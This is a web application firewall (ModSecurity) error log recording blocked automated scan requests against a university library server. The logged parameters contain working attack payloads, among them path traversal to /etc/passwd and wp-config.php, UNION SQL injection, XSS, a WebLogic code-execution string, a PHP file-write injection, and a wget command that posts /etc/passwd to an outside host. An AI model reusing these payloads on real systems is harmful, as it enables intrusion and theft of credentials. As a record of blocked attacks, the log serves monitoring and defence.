[Tue Aug 29 11:46:28.358354 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14JMCo-f0AAAhui4IAAAAr"]
[Tue Aug 29 11:46:28.415645 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAib55gAAAAA"]
[Tue Aug 29 11:46:28.525726 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAi0JN4AAAAK"]
[Tue Aug 29 11:46:29.634366 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JOcAAAAK"]
[Tue Aug 29 11:46:30.626783 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAjFodcAAAAF"]
[Tue Aug 29 11:46:30.668036 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAhtjlQAAAAq"]
[Tue Aug 29 11:46:31.357425 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAhtjl0AAAAq"]
[Tue Aug 29 11:46:31.423730 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAhtjmAAAAAq"]
[Tue Aug 29 11:46:32.379322 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KMCo-f0AAAi0JP8AAAAK"]
[Tue Aug 29 11:46:33.453262 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAi5uIgAAAAS"]
[Tue Aug 29 11:46:34.415238 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAi5uIwAAAAS"]
[Tue Aug 29 11:46:35.452679 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAfEB-IAAAAO"]
[Tue Aug 29 11:46:39.471141 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAjH@voAAAAI"]
[Tue Aug 29 11:46:41.411979 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhZRrEAAAAG"]
[Tue Aug 29 11:46:42.457509 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAi-RFgAAAAH"]
[Tue Aug 29 11:46:43.599549 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAi3Z0sAAAAP"]
[Tue Aug 29 11:46:47.424049 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAhzvnwAAAAx"]
[Tue Aug 29 11:46:49.640703 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAhT37oAAAAD"]
[Tue Aug 29 11:46:52.408543 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAjH@xQAAAAI"]
[Tue Aug 29 11:46:56.474179 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14QMCo-f0AAAjKytgAAAAQ"]
[Tue Aug 29 11:47:00.473315 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjZRX0AAAAS"]
[Tue Aug 29 11:47:01.387953 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjkMz8AAAAI"]
[Tue Aug 29 11:47:02.506422 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAfECBwAAAAO"]
[Tue Aug 29 11:47:03.391707 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjbwy4AAAAW"]
[Tue Aug 29 11:47:05.385211 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAfECCEAAAAO"]
[Tue Aug 29 11:47:06.393370 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjdQLkAAAAZ"]
[Tue Aug 29 11:47:06.393461 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjdQLkAAAAZ"]
[Tue Aug 29 11:47:07.368033 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gfxyfo8ho9eurs.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjCbCYAAAAB"]
[Tue Aug 29 11:47:07.746459 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjqDDMAAAAH"]
[Tue Aug 29 11:47:10.672698 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAdxUzkAAAAC"]
[Tue Aug 29 11:47:11.483360 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjkM1sAAAAI"]
[Tue Aug 29 11:47:13.403792 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjL8TQAAAAR"]
[Tue Aug 29 11:47:14.394916 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAdxU0AAAAAC"]
[Tue Aug 29 11:47:15.497664 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14U8Co-f0AAAfECC8AAAAO"]
[Tue Aug 29 11:47:15.509054 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjqDEsAAAAH"]
[Tue Aug 29 11:47:16.388796 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjcHYUAAAAY"]
[Tue Aug 29 11:47:18.498911 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAhui8AAAAAr"]
